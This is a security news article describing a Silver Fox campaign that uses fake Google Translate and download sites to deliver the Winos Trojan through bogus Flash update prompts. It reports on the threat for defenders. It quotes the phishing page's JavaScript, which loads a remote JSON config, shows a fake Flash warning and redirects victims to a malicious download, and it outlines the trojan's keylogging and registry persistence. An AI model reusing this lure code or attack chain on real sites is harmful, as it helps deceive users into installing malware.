Silver Fox Hackers Using Weaponized Google Translate Tools to Deploy Windows Malware

A sophisticated malware campaign has emerged targeting unsuspecting users through weaponized versions of popular online tools, particularly Google Translate interfaces.

The Silver Fox threat actors have developed an intricate attack chain that leverages social engineering tactics to deliver the notorious Winos Trojan, representing a significant evolution in malware distribution techniques that exploit users’ trust in legitimate web services.

The attack methodology centers around creating convincing replicas of widely-used applications and websites, with attackers establishing fake Google Translate portals, currency converters, and software download pages for popular applications like WPS Office.

When users interact with these malicious sites, they encounter deceptive Flash update prompts that redirect them to attacker-controlled download servers hosting malicious installation packages.

Knownsec 404 team researchers identified this campaign as part of a broader Silver Fox operation that has been active since 2024, with the threat actors demonstrating remarkable adaptability in their social engineering approaches.

The researchers noted that this particular variant represents a significant departure from traditional malware distribution methods, as it specifically targets users seeking translation services and productivity tools.

The infection mechanism reveals sophisticated technical implementation, with attackers embedding carefully crafted JavaScript code within the phishing websites.

The malicious script creates hidden input elements and attempts to fetch configuration data from remote JSON files before displaying fake Flash update notifications.

The embedded redirect script demonstrates the attackers’ technical proficiency:-

fetch('url.json')
.then(response => response.json())
.then(data => {
    const urlToUse = data[0];
    document.body.addEventListener('click', function() {
        alert("检测Flash版本过低,请安装后插件重试!");
    });
    window.location.href = urlToUse;
});

Upon successful installation, the malware deploys multiple components including javaw.exe, Microsoftdata.exe, and various supporting files that establish persistent access to compromised systems.

The Winos Trojan, masquerading as legitimate Microsoft software, implements comprehensive data theft capabilities including screenshot capture, keylogging, and clipboard monitoring functionalities.

The campaign’s persistence mechanism involves registry manipulation to ensure long-term system compromise, with the malware writing itself into Windows startup locations.

Analysis reveals that the final payload contains references to “RexRat4.0.3” in its program database, indicating the use of commercially available remote access tools that have been repurposed for cybercriminal activities.

This Silver Fox campaign represents a concerning trend in malware distribution, where threat actors increasingly rely on social engineering rather than technical exploits to achieve initial compromise, making user education and awareness crucial components of organizational cybersecurity strategies.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches